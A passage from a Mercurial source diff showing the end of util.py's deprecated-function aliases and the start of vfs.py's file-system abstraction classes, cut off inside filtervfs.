3834 testpid = _deprecatedfunc(procutil.testpid, '4.6', modname='utils.procutil')
3837 try:
3835 try:
3838 setprocname = _deprecatedfunc(procutil.setprocname, '4.6',
3836 setprocname = _deprecatedfunc(procutil.setprocname, '4.6',
3839 modname='utils.procutil')
3837 modname='utils.procutil')
3840 except AttributeError:
3838 except AttributeError:
3841 pass
3839 pass
3842 try:
3840 try:
3843 unblocksignal = _deprecatedfunc(procutil.unblocksignal, '4.6',
3841 unblocksignal = _deprecatedfunc(procutil.unblocksignal, '4.6',
3844 modname='utils.procutil')
3842 modname='utils.procutil')
3845 except AttributeError:
3843 except AttributeError:
3846 pass
3844 pass
3847 closefds = procutil.closefds
3845 closefds = procutil.closefds
3848 isatty = _deprecatedfunc(procutil.isatty, '4.6')
3846 isatty = _deprecatedfunc(procutil.isatty, '4.6')
3849 popen2 = _deprecatedfunc(procutil.popen2, '4.6')
3847 popen2 = _deprecatedfunc(procutil.popen2, '4.6')
3850 popen3 = _deprecatedfunc(procutil.popen3, '4.6')
3848 popen3 = _deprecatedfunc(procutil.popen3, '4.6')
3851 popen4 = _deprecatedfunc(procutil.popen4, '4.6')
3849 popen4 = _deprecatedfunc(procutil.popen4, '4.6')
3852 pipefilter = _deprecatedfunc(procutil.pipefilter, '4.6')
3850 pipefilter = _deprecatedfunc(procutil.pipefilter, '4.6')
3853 tempfilter = _deprecatedfunc(procutil.tempfilter, '4.6')
3851 tempfilter = _deprecatedfunc(procutil.tempfilter, '4.6')
3854 filter = _deprecatedfunc(procutil.filter, '4.6')
3852 filter = _deprecatedfunc(procutil.filter, '4.6')
3855 mainfrozen = _deprecatedfunc(procutil.mainfrozen, '4.6')
3853 mainfrozen = _deprecatedfunc(procutil.mainfrozen, '4.6')
3856 hgexecutable = _deprecatedfunc(procutil.hgexecutable, '4.6')
3854 hgexecutable = _deprecatedfunc(procutil.hgexecutable, '4.6')
3857 isstdin = _deprecatedfunc(procutil.isstdin, '4.6')
3855 isstdin = _deprecatedfunc(procutil.isstdin, '4.6')
3858 isstdout = _deprecatedfunc(procutil.isstdout, '4.6')
3856 isstdout = _deprecatedfunc(procutil.isstdout, '4.6')
3859 shellenviron = _deprecatedfunc(procutil.shellenviron, '4.6')
3857 shellenviron = _deprecatedfunc(procutil.shellenviron, '4.6')
3860 system = _deprecatedfunc(procutil.system, '4.6')
3858 system = _deprecatedfunc(procutil.system, '4.6')
3861 gui = _deprecatedfunc(procutil.gui, '4.6')
3859 gui = _deprecatedfunc(procutil.gui, '4.6')
3862 hgcmd = _deprecatedfunc(procutil.hgcmd, '4.6')
3860 hgcmd = _deprecatedfunc(procutil.hgcmd, '4.6')
3863 rundetached = _deprecatedfunc(procutil.rundetached, '4.6')
3861 rundetached = _deprecatedfunc(procutil.rundetached, '4.6')
3864
3862
3865 binary = _deprecatedfunc(stringutil.binary, '4.6')
3863 binary = _deprecatedfunc(stringutil.binary, '4.6')
3866 stringmatcher = _deprecatedfunc(stringutil.stringmatcher, '4.6')
3864 stringmatcher = _deprecatedfunc(stringutil.stringmatcher, '4.6')
3867 shortuser = _deprecatedfunc(stringutil.shortuser, '4.6')
3865 shortuser = _deprecatedfunc(stringutil.shortuser, '4.6')
3868 emailuser = _deprecatedfunc(stringutil.emailuser, '4.6')
3866 emailuser = _deprecatedfunc(stringutil.emailuser, '4.6')
3869 email = _deprecatedfunc(stringutil.email, '4.6')
3867 email = _deprecatedfunc(stringutil.email, '4.6')
3870 ellipsis = _deprecatedfunc(stringutil.ellipsis, '4.6')
3868 ellipsis = _deprecatedfunc(stringutil.ellipsis, '4.6')
3871 escapestr = _deprecatedfunc(stringutil.escapestr, '4.6')
3869 escapestr = _deprecatedfunc(stringutil.escapestr, '4.6')
3872 unescapestr = _deprecatedfunc(stringutil.unescapestr, '4.6')
3870 unescapestr = _deprecatedfunc(stringutil.unescapestr, '4.6')
3873 forcebytestr = _deprecatedfunc(stringutil.forcebytestr, '4.6')
3871 forcebytestr = _deprecatedfunc(stringutil.forcebytestr, '4.6')
3874 uirepr = _deprecatedfunc(stringutil.uirepr, '4.6')
3872 uirepr = _deprecatedfunc(stringutil.uirepr, '4.6')
3875 wrap = _deprecatedfunc(stringutil.wrap, '4.6')
3873 wrap = _deprecatedfunc(stringutil.wrap, '4.6')
3876 parsebool = _deprecatedfunc(stringutil.parsebool, '4.6')
3874 parsebool = _deprecatedfunc(stringutil.parsebool, '4.6')
@@ -1,653 +1,653 b''
1 # vfs.py - Mercurial 'vfs' classes
1 # vfs.py - Mercurial 'vfs' classes
2 #
2 #
3 # Copyright Matt Mackall <mpm@selenic.com>
3 # Copyright Matt Mackall <mpm@selenic.com>
4 #
4 #
5 # This software may be used and distributed according to the terms of the
5 # This software may be used and distributed according to the terms of the
6 # GNU General Public License version 2 or any later version.
6 # GNU General Public License version 2 or any later version.
7 from __future__ import absolute_import
7 from __future__ import absolute_import
8
8
9 import contextlib
9 import contextlib
10 import errno
10 import errno
11 import os
11 import os
12 import shutil
12 import shutil
13 import stat
13 import stat
14 import tempfile
14 import tempfile
15 import threading
15 import threading
16
16
17 from .i18n import _
17 from .i18n import _
18 from . import (
18 from . import (
19 encoding,
19 encoding,
20 error,
20 error,
21 pathutil,
21 pathutil,
22 pycompat,
22 pycompat,
23 util,
23 util,
24 )
24 )
25
25
26 def _avoidambig(path, oldstat):
26 def _avoidambig(path, oldstat):
27 """Avoid file stat ambiguity forcibly
27 """Avoid file stat ambiguity forcibly
28
28
29 This function causes copying ``path`` file, if it is owned by
29 This function causes copying ``path`` file, if it is owned by
30 another (see issue5418 and issue5584 for detail).
30 another (see issue5418 and issue5584 for detail).
31 """
31 """
32 def checkandavoid():
32 def checkandavoid():
33 newstat = util.filestat.frompath(path)
33 newstat = util.filestat.frompath(path)
34 # return whether file stat ambiguity is (already) avoided
34 # return whether file stat ambiguity is (already) avoided
35 return (not newstat.isambig(oldstat) or
35 return (not newstat.isambig(oldstat) or
36 newstat.avoidambig(path, oldstat))
36 newstat.avoidambig(path, oldstat))
37 if not checkandavoid():
37 if not checkandavoid():
38 # simply copy to change owner of path to get privilege to
38 # simply copy to change owner of path to get privilege to
39 # advance mtime (see issue5418)
39 # advance mtime (see issue5418)
40 util.rename(util.mktempcopy(path), path)
40 util.rename(util.mktempcopy(path), path)
41 checkandavoid()
41 checkandavoid()
42
42
43 class abstractvfs(object):
43 class abstractvfs(object):
44 """Abstract base class; cannot be instantiated"""
44 """Abstract base class; cannot be instantiated"""
45
45
46 def __init__(self, *args, **kwargs):
46 def __init__(self, *args, **kwargs):
47 '''Prevent instantiation; don't call this from subclasses.'''
47 '''Prevent instantiation; don't call this from subclasses.'''
48 raise NotImplementedError('attempted instantiating ' + str(type(self)))
48 raise NotImplementedError('attempted instantiating ' + str(type(self)))
49
49
50 def tryread(self, path):
50 def tryread(self, path):
51 '''gracefully return an empty string for missing files'''
51 '''gracefully return an empty string for missing files'''
52 try:
52 try:
53 return self.read(path)
53 return self.read(path)
54 except IOError as inst:
54 except IOError as inst:
55 if inst.errno != errno.ENOENT:
55 if inst.errno != errno.ENOENT:
56 raise
56 raise
57 return ""
57 return ""
58
58
59 def tryreadlines(self, path, mode='rb'):
59 def tryreadlines(self, path, mode='rb'):
60 '''gracefully return an empty array for missing files'''
60 '''gracefully return an empty array for missing files'''
61 try:
61 try:
62 return self.readlines(path, mode=mode)
62 return self.readlines(path, mode=mode)
63 except IOError as inst:
63 except IOError as inst:
64 if inst.errno != errno.ENOENT:
64 if inst.errno != errno.ENOENT:
65 raise
65 raise
66 return []
66 return []
67
67
68 @util.propertycache
68 @util.propertycache
69 def open(self):
69 def open(self):
70 '''Open ``path`` file, which is relative to vfs root.
70 '''Open ``path`` file, which is relative to vfs root.
71
71
72 Newly created directories are marked as "not to be indexed by
72 Newly created directories are marked as "not to be indexed by
73 the content indexing service", if ``notindexed`` is specified
73 the content indexing service", if ``notindexed`` is specified
74 for "write" mode access.
74 for "write" mode access.
75 '''
75 '''
76 return self.__call__
76 return self.__call__
77
77
78 def read(self, path):
78 def read(self, path):
79 with self(path, 'rb') as fp:
79 with self(path, 'rb') as fp:
80 return fp.read()
80 return fp.read()
81
81
82 def readlines(self, path, mode='rb'):
82 def readlines(self, path, mode='rb'):
83 with self(path, mode=mode) as fp:
83 with self(path, mode=mode) as fp:
84 return fp.readlines()
84 return fp.readlines()
85
85
86 def write(self, path, data, backgroundclose=False, **kwargs):
86 def write(self, path, data, backgroundclose=False, **kwargs):
87 with self(path, 'wb', backgroundclose=backgroundclose, **kwargs) as fp:
87 with self(path, 'wb', backgroundclose=backgroundclose, **kwargs) as fp:
88 return fp.write(data)
88 return fp.write(data)
89
89
90 def writelines(self, path, data, mode='wb', notindexed=False):
90 def writelines(self, path, data, mode='wb', notindexed=False):
91 with self(path, mode=mode, notindexed=notindexed) as fp:
91 with self(path, mode=mode, notindexed=notindexed) as fp:
92 return fp.writelines(data)
92 return fp.writelines(data)
93
93
94 def append(self, path, data):
94 def append(self, path, data):
95 with self(path, 'ab') as fp:
95 with self(path, 'ab') as fp:
96 return fp.write(data)
96 return fp.write(data)
97
97
98 def basename(self, path):
98 def basename(self, path):
99 """return base element of a path (as os.path.basename would do)
99 """return base element of a path (as os.path.basename would do)
100
100
101 This exists to allow handling of strange encoding if needed."""
101 This exists to allow handling of strange encoding if needed."""
102 return os.path.basename(path)
102 return os.path.basename(path)
103
103
104 def chmod(self, path, mode):
104 def chmod(self, path, mode):
105 return os.chmod(self.join(path), mode)
105 return os.chmod(self.join(path), mode)
106
106
107 def dirname(self, path):
107 def dirname(self, path):
108 """return dirname element of a path (as os.path.dirname would do)
108 """return dirname element of a path (as os.path.dirname would do)
109
109
110 This exists to allow handling of strange encoding if needed."""
110 This exists to allow handling of strange encoding if needed."""
111 return os.path.dirname(path)
111 return os.path.dirname(path)
112
112
113 def exists(self, path=None):
113 def exists(self, path=None):
114 return os.path.exists(self.join(path))
114 return os.path.exists(self.join(path))
115
115
116 def fstat(self, fp):
116 def fstat(self, fp):
117 return util.fstat(fp)
117 return util.fstat(fp)
118
118
119 def isdir(self, path=None):
119 def isdir(self, path=None):
120 return os.path.isdir(self.join(path))
120 return os.path.isdir(self.join(path))
121
121
122 def isfile(self, path=None):
122 def isfile(self, path=None):
123 return os.path.isfile(self.join(path))
123 return os.path.isfile(self.join(path))
124
124
125 def islink(self, path=None):
125 def islink(self, path=None):
126 return os.path.islink(self.join(path))
126 return os.path.islink(self.join(path))
127
127
128 def isfileorlink(self, path=None):
128 def isfileorlink(self, path=None):
129 '''return whether path is a regular file or a symlink
129 '''return whether path is a regular file or a symlink
130
130
131 Unlike isfile, this doesn't follow symlinks.'''
131 Unlike isfile, this doesn't follow symlinks.'''
132 try:
132 try:
133 st = self.lstat(path)
133 st = self.lstat(path)
134 except OSError:
134 except OSError:
135 return False
135 return False
136 mode = st.st_mode
136 mode = st.st_mode
137 return stat.S_ISREG(mode) or stat.S_ISLNK(mode)
137 return stat.S_ISREG(mode) or stat.S_ISLNK(mode)
138
138
139 def reljoin(self, *paths):
139 def reljoin(self, *paths):
140 """join various elements of a path together (as os.path.join would do)
140 """join various elements of a path together (as os.path.join would do)
141
141
142 The vfs base is not injected so that path stay relative. This exists
142 The vfs base is not injected so that path stay relative. This exists
143 to allow handling of strange encoding if needed."""
143 to allow handling of strange encoding if needed."""
144 return os.path.join(*paths)
144 return os.path.join(*paths)
145
145
146 def split(self, path):
146 def split(self, path):
147 """split top-most element of a path (as os.path.split would do)
147 """split top-most element of a path (as os.path.split would do)
148
148
149 This exists to allow handling of strange encoding if needed."""
149 This exists to allow handling of strange encoding if needed."""
150 return os.path.split(path)
150 return os.path.split(path)
151
151
152 def lexists(self, path=None):
152 def lexists(self, path=None):
153 return os.path.lexists(self.join(path))
153 return os.path.lexists(self.join(path))
154
154
155 def lstat(self, path=None):
155 def lstat(self, path=None):
156 return os.lstat(self.join(path))
156 return os.lstat(self.join(path))
157
157
158 def listdir(self, path=None):
158 def listdir(self, path=None):
159 return os.listdir(self.join(path))
159 return os.listdir(self.join(path))
160
160
161 def makedir(self, path=None, notindexed=True):
161 def makedir(self, path=None, notindexed=True):
162 return util.makedir(self.join(path), notindexed)
162 return util.makedir(self.join(path), notindexed)
163
163
164 def makedirs(self, path=None, mode=None):
164 def makedirs(self, path=None, mode=None):
165 return util.makedirs(self.join(path), mode)
165 return util.makedirs(self.join(path), mode)
166
166
167 def makelock(self, info, path):
167 def makelock(self, info, path):
168 return util.makelock(info, self.join(path))
168 return util.makelock(info, self.join(path))
169
169
170 def mkdir(self, path=None):
170 def mkdir(self, path=None):
171 return os.mkdir(self.join(path))
171 return os.mkdir(self.join(path))
172
172
173 def mkstemp(self, suffix='', prefix='tmp', dir=None):
173 def mkstemp(self, suffix='', prefix='tmp', dir=None):
174 fd, name = tempfile.mkstemp(suffix=suffix, prefix=prefix,
174 fd, name = tempfile.mkstemp(suffix=suffix, prefix=prefix,
175 dir=self.join(dir))
175 dir=self.join(dir))
176 dname, fname = util.split(name)
176 dname, fname = util.split(name)
177 if dir:
177 if dir:
178 return fd, os.path.join(dir, fname)
178 return fd, os.path.join(dir, fname)
179 else:
179 else:
180 return fd, fname
180 return fd, fname
181
181
182 def readdir(self, path=None, stat=None, skip=None):
182 def readdir(self, path=None, stat=None, skip=None):
183 return util.listdir(self.join(path), stat, skip)
183 return util.listdir(self.join(path), stat, skip)
184
184
185 def readlock(self, path):
185 def readlock(self, path):
186 return util.readlock(self.join(path))
186 return util.readlock(self.join(path))
187
187
188 def rename(self, src, dst, checkambig=False):
188 def rename(self, src, dst, checkambig=False):
189 """Rename from src to dst
189 """Rename from src to dst
190
190
191 checkambig argument is used with util.filestat, and is useful
191 checkambig argument is used with util.filestat, and is useful
192 only if destination file is guarded by any lock
192 only if destination file is guarded by any lock
193 (e.g. repo.lock or repo.wlock).
193 (e.g. repo.lock or repo.wlock).
194
194
195 To avoid file stat ambiguity forcibly, checkambig=True involves
195 To avoid file stat ambiguity forcibly, checkambig=True involves
196 copying ``src`` file, if it is owned by another. Therefore, use
196 copying ``src`` file, if it is owned by another. Therefore, use
197 checkambig=True only in limited cases (see also issue5418 and
197 checkambig=True only in limited cases (see also issue5418 and
198 issue5584 for detail).
198 issue5584 for detail).
199 """
199 """
200 srcpath = self.join(src)
200 srcpath = self.join(src)
201 dstpath = self.join(dst)
201 dstpath = self.join(dst)
202 oldstat = checkambig and util.filestat.frompath(dstpath)
202 oldstat = checkambig and util.filestat.frompath(dstpath)
203 if oldstat and oldstat.stat:
203 if oldstat and oldstat.stat:
204 ret = util.rename(srcpath, dstpath)
204 ret = util.rename(srcpath, dstpath)
205 _avoidambig(dstpath, oldstat)
205 _avoidambig(dstpath, oldstat)
206 return ret
206 return ret
207 return util.rename(srcpath, dstpath)
207 return util.rename(srcpath, dstpath)
208
208
209 def readlink(self, path):
209 def readlink(self, path):
210 return os.readlink(self.join(path))
210 return os.readlink(self.join(path))
211
211
212 def removedirs(self, path=None):
212 def removedirs(self, path=None):
213 """Remove a leaf directory and all empty intermediate ones
213 """Remove a leaf directory and all empty intermediate ones
214 """
214 """
215 return util.removedirs(self.join(path))
215 return util.removedirs(self.join(path))
216
216
217 def rmtree(self, path=None, ignore_errors=False, forcibly=False):
217 def rmtree(self, path=None, ignore_errors=False, forcibly=False):
218 """Remove a directory tree recursively
218 """Remove a directory tree recursively
219
219
220 If ``forcibly``, this tries to remove READ-ONLY files, too.
220 If ``forcibly``, this tries to remove READ-ONLY files, too.
221 """
221 """
222 if forcibly:
222 if forcibly:
223 def onerror(function, path, excinfo):
223 def onerror(function, path, excinfo):
224 if function is not os.remove:
224 if function is not os.remove:
225 raise
225 raise
226 # read-only files cannot be unlinked under Windows
226 # read-only files cannot be unlinked under Windows
227 s = os.stat(path)
227 s = os.stat(path)
228 if (s.st_mode & stat.S_IWRITE) != 0:
228 if (s.st_mode & stat.S_IWRITE) != 0:
229 raise
229 raise
230 os.chmod(path, stat.S_IMODE(s.st_mode) | stat.S_IWRITE)
230 os.chmod(path, stat.S_IMODE(s.st_mode) | stat.S_IWRITE)
231 os.remove(path)
231 os.remove(path)
232 else:
232 else:
233 onerror = None
233 onerror = None
234 return shutil.rmtree(self.join(path),
234 return shutil.rmtree(self.join(path),
235 ignore_errors=ignore_errors, onerror=onerror)
235 ignore_errors=ignore_errors, onerror=onerror)
236
236
237 def setflags(self, path, l, x):
237 def setflags(self, path, l, x):
238 return util.setflags(self.join(path), l, x)
238 return util.setflags(self.join(path), l, x)
239
239
240 def stat(self, path=None):
240 def stat(self, path=None):
241 return os.stat(self.join(path))
241 return os.stat(self.join(path))
242
242
243 def unlink(self, path=None):
243 def unlink(self, path=None):
244 return util.unlink(self.join(path))
244 return util.unlink(self.join(path))
245
245
246 def tryunlink(self, path=None):
246 def tryunlink(self, path=None):
247 """Attempt to remove a file, ignoring missing file errors."""
247 """Attempt to remove a file, ignoring missing file errors."""
248 util.tryunlink(self.join(path))
248 util.tryunlink(self.join(path))
249
249
250 def unlinkpath(self, path=None, ignoremissing=False):
250 def unlinkpath(self, path=None, ignoremissing=False):
251 return util.unlinkpath(self.join(path), ignoremissing=ignoremissing)
251 return util.unlinkpath(self.join(path), ignoremissing=ignoremissing)
252
252
253 def utime(self, path=None, t=None):
253 def utime(self, path=None, t=None):
254 return os.utime(self.join(path), t)
254 return os.utime(self.join(path), t)
255
255
256 def walk(self, path=None, onerror=None):
256 def walk(self, path=None, onerror=None):
257 """Yield (dirpath, dirs, files) tuple for each directories under path
257 """Yield (dirpath, dirs, files) tuple for each directories under path
258
258
259 ``dirpath`` is relative one from the root of this vfs. This
259 ``dirpath`` is relative one from the root of this vfs. This
260 uses ``os.sep`` as path separator, even you specify POSIX
260 uses ``os.sep`` as path separator, even you specify POSIX
261 style ``path``.
261 style ``path``.
262
262
263 "The root of this vfs" is represented as empty ``dirpath``.
263 "The root of this vfs" is represented as empty ``dirpath``.
264 """
264 """
265 root = os.path.normpath(self.join(None))
265 root = os.path.normpath(self.join(None))
266 # when dirpath == root, dirpath[prefixlen:] becomes empty
266 # when dirpath == root, dirpath[prefixlen:] becomes empty
267 # because len(dirpath) < prefixlen.
267 # because len(dirpath) < prefixlen.
268 prefixlen = len(pathutil.normasprefix(root))
268 prefixlen = len(pathutil.normasprefix(root))
269 for dirpath, dirs, files in os.walk(self.join(path), onerror=onerror):
269 for dirpath, dirs, files in os.walk(self.join(path), onerror=onerror):
270 yield (dirpath[prefixlen:], dirs, files)
270 yield (dirpath[prefixlen:], dirs, files)
271
271
272 @contextlib.contextmanager
272 @contextlib.contextmanager
273 def backgroundclosing(self, ui, expectedcount=-1):
273 def backgroundclosing(self, ui, expectedcount=-1):
274 """Allow files to be closed asynchronously.
274 """Allow files to be closed asynchronously.
275
275
276 When this context manager is active, ``backgroundclose`` can be passed
276 When this context manager is active, ``backgroundclose`` can be passed
277 to ``__call__``/``open`` to result in the file possibly being closed
277 to ``__call__``/``open`` to result in the file possibly being closed
278 asynchronously, on a background thread.
278 asynchronously, on a background thread.
279 """
279 """
280 # Sharing backgroundfilecloser between threads is complex and using
280 # Sharing backgroundfilecloser between threads is complex and using
281 # multiple instances puts us at risk of running out of file descriptors
281 # multiple instances puts us at risk of running out of file descriptors
282 # only allow to use backgroundfilecloser when in main thread.
282 # only allow to use backgroundfilecloser when in main thread.
283 if not isinstance(threading.currentThread(), threading._MainThread):
283 if not isinstance(threading.currentThread(), threading._MainThread):
284 yield
284 yield
285 return
285 return
286 vfs = getattr(self, 'vfs', self)
286 vfs = getattr(self, 'vfs', self)
287 if getattr(vfs, '_backgroundfilecloser', None):
287 if getattr(vfs, '_backgroundfilecloser', None):
288 raise error.Abort(
288 raise error.Abort(
289 _('can only have 1 active background file closer'))
289 _('can only have 1 active background file closer'))
290
290
291 with backgroundfilecloser(ui, expectedcount=expectedcount) as bfc:
291 with backgroundfilecloser(ui, expectedcount=expectedcount) as bfc:
292 try:
292 try:
293 vfs._backgroundfilecloser = bfc
293 vfs._backgroundfilecloser = bfc
294 yield bfc
294 yield bfc
295 finally:
295 finally:
296 vfs._backgroundfilecloser = None
296 vfs._backgroundfilecloser = None
297
297
298 class vfs(abstractvfs):
298 class vfs(abstractvfs):
299 '''Operate files relative to a base directory
299 '''Operate files relative to a base directory
300
300
301 This class is used to hide the details of COW semantics and
301 This class is used to hide the details of COW semantics and
302 remote file access from higher level code.
302 remote file access from higher level code.
303
303
304 'cacheaudited' should be enabled only if (a) vfs object is short-lived, or
304 'cacheaudited' should be enabled only if (a) vfs object is short-lived, or
305 (b) the base directory is managed by hg and considered sort-of append-only.
305 (b) the base directory is managed by hg and considered sort-of append-only.
306 See pathutil.pathauditor() for details.
306 See pathutil.pathauditor() for details.
307 '''
307 '''
308 def __init__(self, base, audit=True, cacheaudited=False, expandpath=False,
308 def __init__(self, base, audit=True, cacheaudited=False, expandpath=False,
309 realpath=False):
309 realpath=False):
310 if expandpath:
310 if expandpath:
311 base = util.expandpath(base)
311 base = util.expandpath(base)
312 if realpath:
312 if realpath:
313 base = os.path.realpath(base)
313 base = os.path.realpath(base)
314 self.base = base
314 self.base = base
315 self._audit = audit
315 self._audit = audit
316 if audit:
316 if audit:
317 self.audit = pathutil.pathauditor(self.base, cached=cacheaudited)
317 self.audit = pathutil.pathauditor(self.base, cached=cacheaudited)
318 else:
318 else:
319 self.audit = (lambda path, mode=None: True)
319 self.audit = (lambda path, mode=None: True)
320 self.createmode = None
320 self.createmode = None
321 self._trustnlink = None
321 self._trustnlink = None
322
322
323 @util.propertycache
323 @util.propertycache
324 def _cansymlink(self):
324 def _cansymlink(self):
325 return util.checklink(self.base)
325 return util.checklink(self.base)
326
326
327 @util.propertycache
327 @util.propertycache
328 def _chmod(self):
328 def _chmod(self):
329 return util.checkexec(self.base)
329 return util.checkexec(self.base)
330
330
331 def _fixfilemode(self, name):
331 def _fixfilemode(self, name):
332 if self.createmode is None or not self._chmod:
332 if self.createmode is None or not self._chmod:
333 return
333 return
334 os.chmod(name, self.createmode & 0o666)
334 os.chmod(name, self.createmode & 0o666)
335
335
336 def __call__(self, path, mode="r", atomictemp=False, notindexed=False,
336 def __call__(self, path, mode="r", atomictemp=False, notindexed=False,
337 backgroundclose=False, checkambig=False, auditpath=True):
337 backgroundclose=False, checkambig=False, auditpath=True):
338 '''Open ``path`` file, which is relative to vfs root.
338 '''Open ``path`` file, which is relative to vfs root.
339
339
340 Newly created directories are marked as "not to be indexed by
340 Newly created directories are marked as "not to be indexed by
341 the content indexing service", if ``notindexed`` is specified
341 the content indexing service", if ``notindexed`` is specified
342 for "write" mode access.
342 for "write" mode access.
343
343
344 If ``backgroundclose`` is passed, the file may be closed asynchronously.
344 If ``backgroundclose`` is passed, the file may be closed asynchronously.
345 It can only be used if the ``self.backgroundclosing()`` context manager
345 It can only be used if the ``self.backgroundclosing()`` context manager
346 is active. This should only be specified if the following criteria hold:
346 is active. This should only be specified if the following criteria hold:
347
347
348 1. There is a potential for writing thousands of files. Unless you
348 1. There is a potential for writing thousands of files. Unless you
349 are writing thousands of files, the performance benefits of
349 are writing thousands of files, the performance benefits of
350 asynchronously closing files is not realized.
350 asynchronously closing files is not realized.
351 2. Files are opened exactly once for the ``backgroundclosing``
351 2. Files are opened exactly once for the ``backgroundclosing``
352 active duration and are therefore free of race conditions between
352 active duration and are therefore free of race conditions between
353 closing a file on a background thread and reopening it. (If the
353 closing a file on a background thread and reopening it. (If the
354 file were opened multiple times, there could be unflushed data
354 file were opened multiple times, there could be unflushed data
355 because the original file handle hasn't been flushed/closed yet.)
355 because the original file handle hasn't been flushed/closed yet.)
356
356
357 ``checkambig`` argument is passed to atomictemplfile (valid
357 ``checkambig`` argument is passed to atomictemplfile (valid
358 only for writing), and is useful only if target file is
358 only for writing), and is useful only if target file is
359 guarded by any lock (e.g. repo.lock or repo.wlock).
359 guarded by any lock (e.g. repo.lock or repo.wlock).
360
360
361 To avoid file stat ambiguity forcibly, checkambig=True involves
361 To avoid file stat ambiguity forcibly, checkambig=True involves
362 copying ``path`` file opened in "append" mode (e.g. for
362 copying ``path`` file opened in "append" mode (e.g. for
363 truncation), if it is owned by another. Therefore, use
363 truncation), if it is owned by another. Therefore, use
364 combination of append mode and checkambig=True only in limited
364 combination of append mode and checkambig=True only in limited
365 cases (see also issue5418 and issue5584 for detail).
365 cases (see also issue5418 and issue5584 for detail).
366 '''
366 '''
367 if auditpath:
367 if auditpath:
368 if self._audit:
368 if self._audit:
369 r = util.checkosfilename(path)
369 r = util.checkosfilename(path)
370 if r:
370 if r:
371 raise error.Abort("%s: %r" % (r, path))
371 raise error.Abort("%s: %r" % (r, path))
372 self.audit(path, mode=mode)
372 self.audit(path, mode=mode)
373 f = self.join(path)
373 f = self.join(path)
374
374
375 if "b" not in mode:
375 if "b" not in mode:
376 mode += "b" # for that other OS
376 mode += "b" # for that other OS
377
377
378 nlink = -1
378 nlink = -1
379 if mode not in ('r', 'rb'):
379 if mode not in ('r', 'rb'):
380 dirname, basename = util.split(f)
380 dirname, basename = util.split(f)
381 # If basename is empty, then the path is malformed because it points
381 # If basename is empty, then the path is malformed because it points
382 # to a directory. Let the posixfile() call below raise IOError.
382 # to a directory. Let the posixfile() call below raise IOError.
383 if basename:
383 if basename:
384 if atomictemp:
384 if atomictemp:
385 util.makedirs(dirname, self.createmode, notindexed)
385 util.makedirs(dirname, self.createmode, notindexed)
386 return util.atomictempfile(f, mode, self.createmode,
386 return util.atomictempfile(f, mode, self.createmode,
387 checkambig=checkambig)
387 checkambig=checkambig)
388 try:
388 try:
389 if 'w' in mode:
389 if 'w' in mode:
390 util.unlink(f)
390 util.unlink(f)
391 nlink = 0
391 nlink = 0
392 else:
392 else:
393 # nlinks() may behave differently for files on Windows
393 # nlinks() may behave differently for files on Windows
394 # shares if the file is open.
394 # shares if the file is open.
395 with util.posixfile(f):
395 with util.posixfile(f):
396 nlink = util.nlinks(f)
396 nlink = util.nlinks(f)
397 if nlink < 1:
397 if nlink < 1:
398 nlink = 2 # force mktempcopy (issue1922)
398 nlink = 2 # force mktempcopy (issue1922)
399 except (OSError, IOError) as e:
399 except (OSError, IOError) as e:
400 if e.errno != errno.ENOENT:
400 if e.errno != errno.ENOENT:
401 raise
401 raise
402 nlink = 0
402 nlink = 0
403 util.makedirs(dirname, self.createmode, notindexed)
403 util.makedirs(dirname, self.createmode, notindexed)
404 if nlink > 0:
404 if nlink > 0:
405 if self._trustnlink is None:
405 if self._trustnlink is None:
406 self._trustnlink = nlink > 1 or util.checknlink(f)
406 self._trustnlink = nlink > 1 or util.checknlink(f)
407 if nlink > 1 or not self._trustnlink:
407 if nlink > 1 or not self._trustnlink:
408 util.rename(util.mktempcopy(f), f)
408 util.rename(util.mktempcopy(f), f)
409 fp = util.posixfile(f, mode)
409 fp = util.posixfile(f, mode)
410 if nlink == 0:
410 if nlink == 0:
411 self._fixfilemode(f)
411 self._fixfilemode(f)
412
412
413 if checkambig:
413 if checkambig:
414 if mode in ('r', 'rb'):
414 if mode in ('r', 'rb'):
415 raise error.Abort(_('implementation error: mode %s is not'
415 raise error.Abort(_('implementation error: mode %s is not'
416 ' valid for checkambig=True') % mode)
416 ' valid for checkambig=True') % mode)
417 fp = checkambigatclosing(fp)
417 fp = checkambigatclosing(fp)
418
418
419 if (backgroundclose and
419 if (backgroundclose and
420 isinstance(threading.currentThread(), threading._MainThread)):
420 isinstance(threading.currentThread(), threading._MainThread)):
421 if not self._backgroundfilecloser:
421 if not self._backgroundfilecloser:
422 raise error.Abort(_('backgroundclose can only be used when a '
422 raise error.Abort(_('backgroundclose can only be used when a '
423 'backgroundclosing context manager is active')
423 'backgroundclosing context manager is active')
424 )
424 )
425
425
426 fp = delayclosedfile(fp, self._backgroundfilecloser)
426 fp = delayclosedfile(fp, self._backgroundfilecloser)
427
427
428 return fp
428 return fp
429
429
430 def symlink(self, src, dst):
430 def symlink(self, src, dst):
431 self.audit(dst)
431 self.audit(dst)
432 linkname = self.join(dst)
432 linkname = self.join(dst)
433 util.tryunlink(linkname)
433 util.tryunlink(linkname)
434
434
435 util.makedirs(os.path.dirname(linkname), self.createmode)
435 util.makedirs(os.path.dirname(linkname), self.createmode)
436
436
437 if self._cansymlink:
437 if self._cansymlink:
438 try:
438 try:
439 os.symlink(src, linkname)
439 os.symlink(src, linkname)
440 except OSError as err:
440 except OSError as err:
441 raise OSError(err.errno, _('could not symlink to %r: %s') %
441 raise OSError(err.errno, _('could not symlink to %r: %s') %
442 (src, encoding.strtolocal(err.strerror)),
442 (src, encoding.strtolocal(err.strerror)),
443 linkname)
443 linkname)
444 else:
444 else:
445 self.write(dst, src)
445 self.write(dst, src)
446
446
447 def join(self, path, *insidef):
447 def join(self, path, *insidef):
448 if path:
448 if path:
449 return os.path.join(self.base, path, *insidef)
449 return os.path.join(self.base, path, *insidef)
450 else:
450 else:
451 return self.base
451 return self.base
452
452
453 opener = vfs
453 opener = vfs
454
454
455 class proxyvfs(object):
455 class proxyvfs(object):
456 def __init__(self, vfs):
456 def __init__(self, vfs):
457 self.vfs = vfs
457 self.vfs = vfs
458
458
459 @property
459 @property
460 def options(self):
460 def options(self):
461 return self.vfs.options
461 return self.vfs.options
462
462
463 @options.setter
463 @options.setter
464 def options(self, value):
464 def options(self, value):
465 self.vfs.options = value
465 self.vfs.options = value
466
466
467 class filtervfs(abstractvfs, proxyvfs):
467 class filtervfs(abstractvfs, proxyvfs):
468 '''Wrapper vfs for filtering filenames with a function.'''
468 '''Wrapper vfs for filtering filenames with a function.'''
469
469
470 def __init__(self, vfs, filter):
470 def __init__(self, vfs, filter):
471 proxyvfs.__init__(self, vfs)
